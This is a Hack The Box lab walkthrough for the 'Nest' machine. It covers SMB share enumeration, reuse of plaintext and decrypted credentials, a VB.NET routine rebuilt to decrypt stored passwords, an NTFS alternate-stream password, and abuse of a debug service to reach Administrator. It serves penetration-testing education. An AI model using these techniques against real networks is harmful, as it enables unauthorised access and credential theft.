Hack the Box Walkthrough: Nest

  about 3919 words  19 min 

Overview

This post provides a walkthrough of the Nest system on Hack The Box. This walktrough, in entirety, is a spoiler.

I create these walkthroughs as documentation for myself while working through a system; excuse any brevity or lack of formality. I’ve uploaded this walkthrough to help those that may be stuck.

Service Enumeration

To kick things off, we start with some service discovery to figure out what is actually running on this box.

Nmap Scan

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
$ nmap -Pn -n -A -T5 -p1-65535 10.10.10.178
[snip]
PORT     STATE SERVICE       VERSION
445/tcp  open  microsoft-ds?
4386/tcp open  unknown
[snip]
|   Help: 
|     Reporting Service V1.2
|     This service allows users to run queries against databases using the legacy HQK format
|     AVAILABLE COMMANDS ---
|     LIST
|     SETDIR <Directory_Name>
|     RUNQUERY <Query_ID>
|     DEBUG <Password>
|_    HELP <Command>
[snip]
Host script results:
|_clock-skew: 57s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-02-25T04:18:48
|_  start_date: 2020-02-25T04:14:30
[snip]

Enumerating SMB Shares

Since TCP/445 is open, we can take a look to see what shares are available:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
❯ smbclient -L \\\\10.10.10.178
        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        Data            Disk      
        IPC$            IPC       Remote IPC
        Secure$         Disk      
        Users           Disk      
SMB1 disabled -- no workgroup available

The Data share seems to be accessible anonymously. We can recursively list the contents of the share with smbclient:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
❯ smbclient  \\\\10.10.10.178\\Data
smb: \> recurse on 
smb: \> ls
  .                                   D        0  Wed Aug  7 18:53:46 2019
  ..                                  D        0  Wed Aug  7 18:53:46 2019
  IT                                  D        0  Wed Aug  7 18:58:07 2019
  Production                          D        0  Mon Aug  5 17:53:38 2019
  Reports                             D        0  Mon Aug  5 17:53:44 2019
  Shared                              D        0  Wed Aug  7 15:07:51 2019
\IT
NT_STATUS_ACCESS_DENIED listing \IT\*
\Production
NT_STATUS_ACCESS_DENIED listing \Production\*
\Reports
NT_STATUS_ACCESS_DENIED listing \Reports\*
\Shared
  .                                   D        0  Wed Aug  7 15:07:51 2019
  ..                                  D        0  Wed Aug  7 15:07:51 2019
  Maintenance                         D        0  Wed Aug  7 15:07:32 2019
  Templates                           D        0  Wed Aug  7 15:08:07 2019
\Shared\Maintenance
  .                                   D        0  Wed Aug  7 15:07:32 2019
  ..                                  D        0  Wed Aug  7 15:07:32 2019
  Maintenance Alerts.txt              A       48  Mon Aug  5 19:01:44 2019
\Shared\Templates
  .                                   D        0  Wed Aug  7 15:08:07 2019
  ..                                  D        0  Wed Aug  7 15:08:07 2019
  HR                                  D        0  Wed Aug  7 15:08:01 2019
  Marketing                           D        0  Wed Aug  7 15:08:06 2019
\Shared\Templates\HR
  .                                   D        0  Wed Aug  7 15:08:01 2019
  ..                                  D        0  Wed Aug  7 15:08:01 2019
  Welcome Email.txt                   A      425  Wed Aug  7 18:55:36 2019
\Shared\Templates\Marketing
  .                                   D        0  Wed Aug  7 15:08:06 2019
  ..                                  D        0  Wed Aug  7 15:08:06 2019

The Maintenance Alerts.txt and Welcome Email.txt files look potentially interesting. Let’s retrieve them with smbclient:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
❯ smbclient  \\\\10.10.10.178\\Data
Try "help" to get a list of possible commands.
smb: \> cd Shared\Templates\HR\
smb: \Shared\Templates\HR\> ls
  .                                   D        0  Wed Aug  7 15:08:01 2019
  ..                                  D        0  Wed Aug  7 15:08:01 2019
  Welcome Email.txt                   A      425  Wed Aug  7 18:55:36 2019
                10485247 blocks of size 4096. 6544122 blocks available
smb: \Shared\Templates\HR\> mget "Welcome Email.txt"
Get file Welcome Email.txt? y
getting file \Shared\Templates\HR\Welcome Email.txt of size 425 as Welcome Email.txt (3.5 KiloBytes/sec) (average 3.5 KiloBytes/sec)
smb: \Shared\Templates\HR\> cd ../../Maintenance\
smb: \Shared\Maintenance\> mget "Maintenance Alerts.txt"
Get file Maintenance Alerts.txt? y
getting file \Shared\Maintenance\Maintenance Alerts.txt of size 48 as Maintenance Alerts.txt (0.4 KiloBytes/sec) (average 1.9 KiloBytes/sec)

Let’s see if there is anything interesting in the files:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
❯ cat Maintenance\ Alerts.txt
There is currently no scheduled maintenance work%                                                                  ❯ cat Welcome\ Email.txt
We would like to extend a warm welcome to our newest member of staff, <FIRSTNAME> <SURNAME>

You will find your home folder in the following location: 
\\HTB-NEST\Users\<USERNAME>

If you have any issues accessing specific services or workstations, please inform the 
IT department and use the credentials below until all systems have been set up for you.

Username: TempUser
Password: welcome2019

Thank you
HR%                                             

Nice, we have a set of credentials for TempUser. Let’s see if that gives us any further access to the Data share:

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
❯ smbclient  \\\\10.10.10.178\\Data -U TempUser
Enter WORKGROUP\TempUser's password: 
Try "help" to get a list of possible commands.
smb: \> recurse on
smb: \> ls
  .                                   D        0  Wed Aug  7 18:53:46 2019
  ..                                  D        0  Wed Aug  7 18:53:46 2019
  IT                                  D        0  Wed Aug  7 18:58:07 2019
  Production                          D        0  Mon Aug  5 17:53:38 2019
  Reports                             D        0  Mon Aug  5 17:53:44 2019
  Shared                              D        0  Wed Aug  7 15:07:51 2019
\IT
  .                                   D        0  Wed Aug  7 18:58:07 2019
  ..                                  D        0  Wed Aug  7 18:58:07 2019
  Archive                             D        0  Mon Aug  5 18:33:58 2019
  Configs                             D        0  Wed Aug  7 18:59:34 2019
  Installs                            D        0  Wed Aug  7 18:08:30 2019
  Reports                             D        0  Sat Jan 25 19:09:13 2020
  Tools                               D        0  Mon Aug  5 18:33:43 2019
\Production
  .                                   D        0  Mon Aug  5 17:53:38 2019
  ..                                  D        0  Mon Aug  5 17:53:38 2019
\Reports
  .                                   D        0  Mon Aug  5 17:53:44 2019
  ..                                  D        0  Mon Aug  5 17:53:44 2019
\Shared
  .                                   D        0  Wed Aug  7 15:07:51 2019
  ..                                  D        0  Wed Aug  7 15:07:51 2019
  Maintenance                         D        0  Wed Aug  7 15:07:32 2019
  Templates                           D        0  Wed Aug  7 15:08:07 2019
\IT\Archive
  .                                   D        0  Mon Aug  5 18:33:58 2019
  ..                                  D        0  Mon Aug  5 18:33:58 2019
\IT\Configs
  .                                   D        0  Wed Aug  7 18:59:34 2019
  ..                                  D        0  Wed Aug  7 18:59:34 2019
  Adobe                               D        0  Wed Aug  7 15:20:09 2019
  Atlas                               D        0  Tue Aug  6 07:16:18 2019
  DLink                               D        0  Tue Aug  6 09:25:27 2019
  Microsoft                           D        0  Wed Aug  7 15:23:26 2019
  NotepadPlusPlus                     D        0  Wed Aug  7 15:31:37 2019
  RU Scanner                          D        0  Wed Aug  7 16:01:13 2019
  Server Manager                      D        0  Tue Aug  6 09:25:19 2019
\IT\Installs
  .                                   D        0  Wed Aug  7 18:08:30 2019
  ..                                  D        0  Wed Aug  7 18:08:30 2019
\IT\Reports
  .                                   D        0  Sat Jan 25 19:09:13 2020
  ..                                  D        0  Sat Jan 25 19:09:13 2020
\IT\Tools
  .                                   D        0  Mon Aug  5 18:33:43 2019
  ..                                  D        0  Mon Aug  5 18:33:43 2019
\Shared\Maintenance
  .                                   D        0  Wed Aug  7 15:07:32 2019
  ..                                  D        0  Wed Aug  7 15:07:32 2019
  Maintenance Alerts.txt              A       48  Mon Aug  5 19:01:44 2019
\Shared\Templates
  .                                   D        0  Wed Aug  7 15:08:07 2019
  ..                                  D        0  Wed Aug  7 15:08:07 2019
  HR                                  D        0  Wed Aug  7 15:08:01 2019
  Marketing                           D        0  Wed Aug  7 15:08:06 2019
\IT\Configs\Adobe
  .                                   D        0  Wed Aug  7 15:20:09 2019
  ..                                  D        0  Wed Aug  7 15:20:09 2019
  editing.xml                        AH      246  Sat Aug  3 08:58:42 2019
  Options.txt                         A        0  Mon Oct 10 17:11:14 2011
  projects.xml                        A      258  Tue Jan  8 11:30:52 2013
  settings.xml                        A     1274  Wed Aug  7 15:19:12 2019
\IT\Configs\Atlas
  .                                   D        0  Tue Aug  6 07:16:18 2019
  ..                                  D        0  Tue Aug  6 07:16:18 2019
  Temp.XML                            A     1369  Wed Jun 11 03:38:22 2003
\IT\Configs\DLink
  .                                   D        0  Tue Aug  6 09:25:27 2019
  ..                                  D        0  Tue Aug  6 09:25:27 2019
\IT\Configs\Microsoft
  .                                   D        0  Wed Aug  7 15:23:26 2019
  ..                                  D        0  Wed Aug  7 15:23:26 2019
  Options.xml                         A     4598  Sat Mar  3 14:24:24 2012
\IT\Configs\NotepadPlusPlus
  .                                   D        0  Wed Aug  7 15:31:37 2019
  ..                                  D        0  Wed Aug  7 15:31:37 2019
  config.xml                          A     6451  Wed Aug  7 19:01:25 2019
  shortcuts.xml                       A     2108  Wed Aug  7 15:30:27 2019
\IT\Configs\RU Scanner
  .                                   D        0  Wed Aug  7 16:01:13 2019
  ..                                  D        0  Wed Aug  7 16:01:13 2019
  RU_config.xml                       A      270  Thu Aug  8 15:49:37 2019
\IT\Configs\Server Manager
  .                                   D        0  Tue Aug  6 09:25:19 2019
  ..                                  D        0  Tue Aug  6 09:25:19 2019
\Shared\Templates\HR
  .                                   D        0  Wed Aug  7 15:08:01 2019
  ..                                  D        0  Wed Aug  7 15:08:01 2019
  Welcome Email.txt                   A      425  Wed Aug  7 18:55:36 2019
\Shared\Templates\Marketing
  .                                   D        0  Wed Aug  7 15:08:06 2019
  ..                                  D        0  Wed Aug  7 15:08:06 2019
                10485247 blocks of size 4096. 6544122 blocks available

Looks like we have access to a some files in the IT directory now. Let’s just recursively pull down all the files in the share:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
❯ smbget -R  smb://10.10.10.178/Data/ -U TempUser
Password for [TempUser] connecting to //Data/10.10.10.178: 
Using workgroup WORKGROUP, user TempUser
smb://10.10.10.178/Data//IT/Configs/Adobe/editing.xml                                                              
smb://10.10.10.178/Data//IT/Configs/Adobe/Options.txt                                                              
smb://10.10.10.178/Data//IT/Configs/Adobe/projects.xml                                                             
smb://10.10.10.178/Data//IT/Configs/Adobe/settings.xml                                                             
smb://10.10.10.178/Data//IT/Configs/Atlas/Temp.XML                                                                 
smb://10.10.10.178/Data//IT/Configs/Microsoft/Options.xml                                                          
smb://10.10.10.178/Data//IT/Configs/NotepadPlusPlus/config.xml                                                     
smb://10.10.10.178/Data//IT/Configs/NotepadPlusPlus/shortcuts.xml                                                  
smb://10.10.10.178/Data//IT/Configs/RU Scanner/RU_config.xml                                                       
smb://10.10.10.178/Data//Shared/Maintenance/Maintenance Alerts.txt                                                 
smb://10.10.10.178/Data//Shared/Templates/HR/Welcome Email.txt                                                     
Downloaded 16.65kB in 7 seconds

Analyzing the retrived content, we find some interesting data in RU_Config.xml and config.xml

Data//IT/Configs/RU Scanner/RU_Config.xml

1
2
3
4
5
6
<?xml version="1.0"?>
<ConfigFile xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
  <Port>389</Port>
  <Username>c.smith</Username>
  <Password>fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=</Password>
</ConfigFile>

This password looks encrypted, but I thought I would use it to try authenticating to the SMB shares just in case. Authenticaition failed, leading me to suspect that the password needs to be decrypted.

Data//IT/Configs/NotepadPlusPlus/config.xml

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
<?xml version="1.0" encoding="Windows-1252" ?>
<NotepadPlus>
[SNIP]
    <History nbMaxFile="15" inSubMenu="no" customLength="-1">
        <File filename="C:\windows\System32\drivers\etc\hosts" />
        <File filename="\\HTB-NEST\Secure$\IT\Carl\Temp.txt" />
        <File filename="C:\Users\C.Smith\Desktop\todo.txt" />
    </History>
</NotepadPlus>

So it looks like someone was accessing files on the Secure$ share as well as files on the C.Smith user’s desktop.

Let’s see if we can access anything in this share as TempUser:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
❯ smbclient  \\\\10.10.10.178\\Secure$ -U TempUser
smb: \> recurse on
smb: \> ls
  .                                   D        0  Wed Aug  7 19:08:12 2019
  ..                                  D        0  Wed Aug  7 19:08:12 2019
  Finance                             D        0  Wed Aug  7 15:40:13 2019
  HR                                  D        0  Wed Aug  7 19:08:11 2019
  IT                                  D        0  Thu Aug  8 06:59:25 2019
\Finance
NT_STATUS_ACCESS_DENIED listing \Finance\*
\HR
NT_STATUS_ACCESS_DENIED listing \HR\*
\IT
NT_STATUS_ACCESS_DENIED listing \IT\*

Interesting; it seems that the TempUser doesn’t have any access to listing the 3 directories. I wasted a bit of time here putting two and two together, but ultimately I found that the IT\Carl\ folder was indeed listable:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
❯ smbclient  \\\\10.10.10.178\\Secure$ -U TempUser
smb: \> cd IT/Carl
smb: \IT\Carl\> recurse on
smb: \IT\Carl\> ls
  .                                   D        0  Wed Aug  7 15:42:14 2019
  ..                                  D        0  Wed Aug  7 15:42:14 2019
  Docs                                D        0  Wed Aug  7 15:44:00 2019
  Reports                             D        0  Tue Aug  6 09:45:40 2019
  VB Projects                         D        0  Tue Aug  6 10:41:55 2019
\IT\Carl\Docs
  .                                   D        0  Wed Aug  7 15:44:00 2019
  ..                                  D        0  Wed Aug  7 15:44:00 2019
  ip.txt                              A       56  Wed Aug  7 15:44:16 2019
  mmc.txt                             A       73  Wed Aug  7 15:43:42 2019
\IT\Carl\Reports
  .                                   D        0  Tue Aug  6 09:45:40 2019
  ..                                  D        0  Tue Aug  6 09:45:40 2019
\IT\Carl\VB Projects
  .                                   D        0  Tue Aug  6 10:41:55 2019
  ..                                  D        0  Tue Aug  6 10:41:55 2019
  Production                          D        0  Tue Aug  6 10:07:13 2019
  WIP                                 D        0  Tue Aug  6 10:47:41 2019
\IT\Carl\VB Projects\Production
  .                                   D        0  Tue Aug  6 10:07:13 2019
  ..                                  D        0  Tue Aug  6 10:07:13 2019
\IT\Carl\VB Projects\WIP
  .                                   D        0  Tue Aug  6 10:47:41 2019
  ..                                  D        0  Tue Aug  6 10:47:41 2019
  RU                                  D        0  Fri Aug  9 11:36:45 2019
\IT\Carl\VB Projects\WIP\RU
  .                                   D        0  Fri Aug  9 11:36:45 2019
  ..                                  D        0  Fri Aug  9 11:36:45 2019
  RUScanner                           D        0  Wed Aug  7 18:05:54 2019
  RUScanner.sln                       A      871  Tue Aug  6 10:45:36 2019
\IT\Carl\VB Projects\WIP\RU\RUScanner
  .                                   D        0  Wed Aug  7 18:05:54 2019
  ..                                  D        0  Wed Aug  7 18:05:54 2019
  bin                                 D        0  Wed Aug  7 16:00:11 2019
  ConfigFile.vb                       A      772  Wed Aug  7 18:05:09 2019
  Module1.vb                          A      279  Wed Aug  7 18:05:44 2019
  My Project                          D        0  Wed Aug  7 16:00:11 2019
  obj                                 D        0  Wed Aug  7 16:00:11 2019
  RU Scanner.vbproj                   A     4828  Fri Aug  9 11:37:51 2019
  RU Scanner.vbproj.user              A      143  Tue Aug  6 08:55:27 2019
  SsoIntegration.vb                   A      133  Wed Aug  7 18:05:58 2019
  Utils.vb                            A     4888  Wed Aug  7 15:49:35 2019
\IT\Carl\VB Projects\WIP\RU\RUScanner\bin
  .                                   D        0  Wed Aug  7 16:00:11 2019
  ..                                  D        0  Wed Aug  7 16:00:11 2019
  Debug                               D        0  Wed Aug  7 15:59:13 2019
  Release                             D        0  Tue Aug  6 08:55:26 2019
\IT\Carl\VB Projects\WIP\RU\RUScanner\My Project
  .                                   D        0  Wed Aug  7 16:00:11 2019
  ..                                  D        0  Wed Aug  7 16:00:11 2019
  Application.Designer.vb             A      441  Tue Aug  6 08:55:13 2019
  Application.myapp                   A      481  Tue Aug  6 08:55:13 2019
  AssemblyInfo.vb                     A     1163  Tue Aug  6 08:55:13 2019
  Resources.Designer.vb               A     2776  Tue Aug  6 08:55:13 2019
  Resources.resx                      A     5612  Tue Aug  6 08:55:13 2019
  Settings.Designer.vb                A     2989  Tue Aug  6 08:55:13 2019
  Settings.settings                   A      279  Tue Aug  6 08:55:13 2019
\IT\Carl\VB Projects\WIP\RU\RUScanner\obj
  .                                   D        0  Wed Aug  7 16:00:11 2019
  ..                                  D        0  Wed Aug  7 16:00:11 2019
  x86                                 D        0  Wed Aug  7 15:59:18 2019
\IT\Carl\VB Projects\WIP\RU\RUScanner\bin\Debug
  .                                   D        0  Wed Aug  7 15:59:13 2019
  ..                                  D        0  Wed Aug  7 15:59:13 2019
\IT\Carl\VB Projects\WIP\RU\RUScanner\bin\Release
  .                                   D        0  Tue Aug  6 08:55:26 2019
  ..                                  D        0  Tue Aug  6 08:55:26 2019
\IT\Carl\VB Projects\WIP\RU\RUScanner\obj\x86
  .                                   D        0  Wed Aug  7 15:59:18 2019
  ..                                  D        0  Wed Aug  7 15:59:18 2019
                10485247 blocks of size 4096. 6544122 blocks available

Looks like there is some source code written in Visual Basic. Let’s use smbget to recursively download the Secure$\IT\Carl directory for further analysis:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
❯ smbget -rR smb://10.10.10.178/Secure$/IT/Carl/ -U TempUser
Password for [TempUser] connecting to //Secure$/10.10.10.178: 
Using workgroup WORKGROUP, user TempUser
smb://10.10.10.178/Secure$/IT/Carl//Docs/ip.txt
smb://10.10.10.178/Secure$/IT/Carl//Docs/mmc.txt
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/ConfigFile.vb
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/Module1.vb
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/My Project/Application.Designer.vb
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/My Project/Application.myapp
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/My Project/AssemblyInfo.vb
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/My Project/Resources.Designer.vb
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/My Project/Resources.resx
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/My Project/Settings.Designer.vb
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/My Project/Settings.settings
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/RU Scanner.vbproj
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/RU Scanner.vbproj.user
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/SsoIntegration.vb
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/Utils.vb
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner.sln
Downloaded 0b in 6 seconds

Looking at this data, we find some interesting fode in Module1.vb and Utils.vb. As far as content we are interested in, Module1.vb uses Utils.vb to decrypt the password it retrieves from the RU_config.xml configuration file.

We can cut and patch some of this code together to make a single file we can run on https://dotnetfiddle.net:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
Imports System.Text
Imports System.Security.Cryptography
Public Class Utils
	Public Class ConfigFile
    Public Property Port As Integer
    Public Property Username As String
    Public Property Password As String

    Public Sub SaveToFile(Path As String)
						Using File As New System.IO.FileStream(Path, System.IO.FileMode.Create)
            Dim Writer As New System.Xml.Serialization.XmlSerializer(GetType(ConfigFile))
            Writer.Serialize(File, Me)
        End Using
    End Sub

    Public Shared Function LoadFromFile(ByVal FilePath As String) As ConfigFile
        Using File As New System.IO.FileStream(FilePath, System.IO.FileMode.Open)
            Dim Reader As New System.Xml.Serialization.XmlSerializer(GetType(ConfigFile))
            Return DirectCast(Reader.Deserialize(File), ConfigFile)
        End Using
    End Function
  
End Class
    Public Shared Function DecryptString(EncryptedString As String) As String
        If String.IsNullOrEmpty(EncryptedString) Then
            Return String.Empty
        Else
            Return Decrypt(EncryptedString, "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256)
        End If
    End Function

    Public Shared Function Decrypt(ByVal cipherText As String, _
                                   ByVal passPhrase As String, _
                                   ByVal saltValue As String, _
                                    ByVal passwordIterations As Integer, _
                                   ByVal initVector As String, _
                                   ByVal keySize As Integer) _
                           As String
        Dim initVectorBytes As Byte()
        initVectorBytes = Encoding.ASCII.GetBytes(initVector)
        Dim saltValueBytes As Byte()
        saltValueBytes = Encoding.ASCII.GetBytes(saltValue)
        Dim cipherTextBytes As Byte()
		cipherTextBytes = System.Convert.FromBase64String(cipherText)
        Dim password As New Rfc2898DeriveBytes(passPhrase, _
                                           saltValueBytes, _
                                           passwordIterations)
        Dim keyBytes As Byte()
        keyBytes = password.GetBytes(CInt(keySize / 8))
        Dim symmetricKey As New AesCryptoServiceProvider
        symmetricKey.Mode = CipherMode.CBC
        Dim decryptor As ICryptoTransform
        decryptor = symmetricKey.CreateDecryptor(keyBytes, initVectorBytes)
				Dim memoryStream As System.IO.MemoryStream
				memoryStream = New System.IO.MemoryStream(cipherTextBytes)
        Dim cryptoStream As CryptoStream
        cryptoStream = New CryptoStream(memoryStream, _
                                        decryptor, _
                                        CryptoStreamMode.Read)
        Dim plainTextBytes As Byte()
        ReDim plainTextBytes(cipherTextBytes.Length)
        Dim decryptedByteCount As Integer
        decryptedByteCount = cryptoStream.Read(plainTextBytes, _
                                               0, _
                                               plainTextBytes.Length)
        memoryStream.Close()
        cryptoStream.Close()
        Dim plainText As String
        plainText = Encoding.ASCII.GetString(plainTextBytes, _
                                            0, _
                                            decryptedByteCount)
	System.Console.WriteLine(plainText)
	Return plainText
    End Function

Public Class SsoIntegration
    Public Property Username As String
    Public Property Password As String
End Class
    
    Sub Main()
		Dim test As New SsoIntegration With {.Username = "c.smith", .Password = Utils.DecryptString("fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=")}
    End Sub
End Class

Note that I inserted a line to print the plainText variable before the Decrypt function returns. The above code on https://dotnetfiddle.net gives us xRxRxPANCAK3SxRxRx as the plaintext output. This is the password for the c.smith user.

Enumeration as C.Smith

Let’s see if we have any meaningful access to content in the Users SMB share:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
❯ smbclient  \\\\10.10.10.178\\Users -U C.Smith
Enter WORKGROUP\C.Smith's password: 
smb: \> recurse on
smb: \> ls
  .                                   D        0  Sat Jan 25 18:04:21 2020
  ..                                  D        0  Sat Jan 25 18:04:21 2020
  Administrator                       D        0  Fri Aug  9 11:08:23 2019
  C.Smith                             D        0  Sun Jan 26 02:21:44 2020
  L.Frost                             D        0  Thu Aug  8 13:03:01 2019
  R.Thompson                          D        0  Thu Aug  8 13:02:50 2019
  TempUser                            D        0  Wed Aug  7 18:55:56 2019

\Administrator
NT_STATUS_ACCESS_DENIED listing \Administrator\*

\C.Smith
  .                                   D        0  Sun Jan 26 02:21:44 2020
  ..                                  D        0  Sun Jan 26 02:21:44 2020
  HQK Reporting                       D        0  Thu Aug  8 19:06:17 2019
  user.txt                            A       32  Thu Aug  8 19:05:24 2019

\L.Frost
NT_STATUS_ACCESS_DENIED listing \L.Frost\*

\R.Thompson
NT_STATUS_ACCESS_DENIED listing \R.Thompson\*

\TempUser
NT_STATUS_ACCESS_DENIED listing \TempUser\*

\C.Smith\HQK Reporting
  .                                   D        0  Thu Aug  8 19:06:17 2019
  ..                                  D        0  Thu Aug  8 19:06:17 2019
  AD Integration Module               D        0  Fri Aug  9 08:18:42 2019
  Debug Mode Password.txt             A        0  Thu Aug  8 19:08:17 2019
  HQK_Config_Backup.xml               A      249  Thu Aug  8 19:09:05 2019

\C.Smith\HQK Reporting\AD Integration Module
  .                                   D        0  Fri Aug  9 08:18:42 2019
  ..                                  D        0  Fri Aug  9 08:18:42 2019
  HqkLdap.exe                         A    17408  Wed Aug  7 19:41:16 2019

Getting User Flag

As we can see from the above output, the user flag is located in Users\C.Smith\user.txt:

1
2
3
4
5
smb: \C.Smith\> get user.txt 
getting file \C.Smith\user.txt of size 32 as user.txt (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec)

❯ cat user.txt
[redacted]

Privilege Elevation

I initially came across the Debug Mode Password.txt file and thought this could be used to authenticate to the DEBUG mode of the “HQK Reporting Service v1.2” service running on port 4386. The file appeared to have 0 bytes. I spent some time searching around further and couldn’t find any other files of interest. After wasting some time on futile approaches, I eventually realized that the file could potentially have had alternate streams on an NTFS file system. I enumerated the streams and retrieved the Password stream of the file:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
smb: \C.Smith\HQK Reporting\> allinfo "Debug Mode Password.txt"
altname: DEBUGM~1.TXT
create_time:    Thu Aug  8 07:06:12 PM 2019 EDT
access_time:    Thu Aug  8 07:06:12 PM 2019 EDT
write_time:     Thu Aug  8 07:08:17 PM 2019 EDT
change_time:    Thu Aug  8 07:08:17 PM 2019 EDT
attributes: A (20)
stream: [::$DATA], 0 bytes
stream: [:Password:$DATA], 15 bytes

❯ cat Debug\ Mode\ Password.txt:Password
WBQ201953D8w 

You can then use this password to gain the ability to run the SHOWQUERY command on the HQK Reporting Service. This functionality can be used to read files. After spending some time searching around I came across the Ldap.conf file that is located in ../LDAP/.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
❯ telnet 10.10.10.178 4386
Trying 10.10.10.178...
Connected to 10.10.10.178.
Escape character is '^]'.

HQK Reporting Service V1.2

>help
This service allows users to run queries against databases using the legacy HQK format
--- AVAILABLE COMMANDS ---
LIST
SETDIR <Directory_Name>
RUNQUERY <Query_ID>
DEBUG <Password>
HELP <Command>
>DEBUG WBQ201953D8w     
Debug mode enabled. Use the HELP command to view additional commands that are now available
>help
This service allows users to run queries against databases using the legacy HQK format
--- AVAILABLE COMMANDS ---
LIST
SETDIR <Directory_Name>
RUNQUERY <Query_ID>
DEBUG <Password>
HELP <Command>
SERVICE
SESSION
SHOWQUERY <Query_ID>
>setdir ..
Current directory set to HQK
>list
Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command
 QUERY FILES IN CURRENT DIRECTORY
[DIR]  ALL QUERIES
[DIR]  LDAP
[DIR]  Logs
[1]   HqkSvc.exe
[2]   HqkSvc.InstallState
[3]   HQK_Config.xml
Current Directory: HQK
>setdir LDAP
Current directory set to LDAP
>list   
Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command
 QUERY FILES IN CURRENT DIRECTORY
[1]   HqkLdap.exe
[2]   Ldap.conf
Current Directory: LDAP
>showquery 2
Domain=nest.local
Port=389
BaseOu=OU=WBQ Users,OU=Production,DC=nest,DC=local
User=Administrator
Password=yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=

I took used dnSpy to analyze HqkLdap.exe .NET binary. It turns out that the binary will use the first supplied argument and attempt to extract the domain, username, and password information in order to make an LDAP search. I patched the Main function of the binary to remove the check for presence of HqkDbImport.exe and then to print the decrypted password to the console:

Getting Root Flag

I surmised that this password was for the Administrator account. I confirmed I could mount the C$ share as the Administrator user and then retrieve the root flag.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
❯ smbclient  \\\\10.10.10.178\\c$ -U Administrator
Enter WORKGROUP\Administrator's password: 
Try "help" to get a list of possible commands.
smb: \> cd Users\Administrator\Desktop\
smb: \Users\Administrator\Desktop\> ls
  .                                  DR        0  Sun Jan 26 02:20:50 2020
  ..                                 DR        0  Sun Jan 26 02:20:50 2020
  desktop.ini                       AHS      282  Sat Jan 25 17:02:44 2020
  root.txt                            A       32  Mon Aug  5 18:27:26 2019
                10485247 blocks of size 4096. 6544088 blocks available
smb: \Users\Administrator\Desktop\> get root.txt
getting file \Users\Administrator\Desktop\root.txt of size 32 as root.txt (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec)

❯ cat root.txt
[redacted]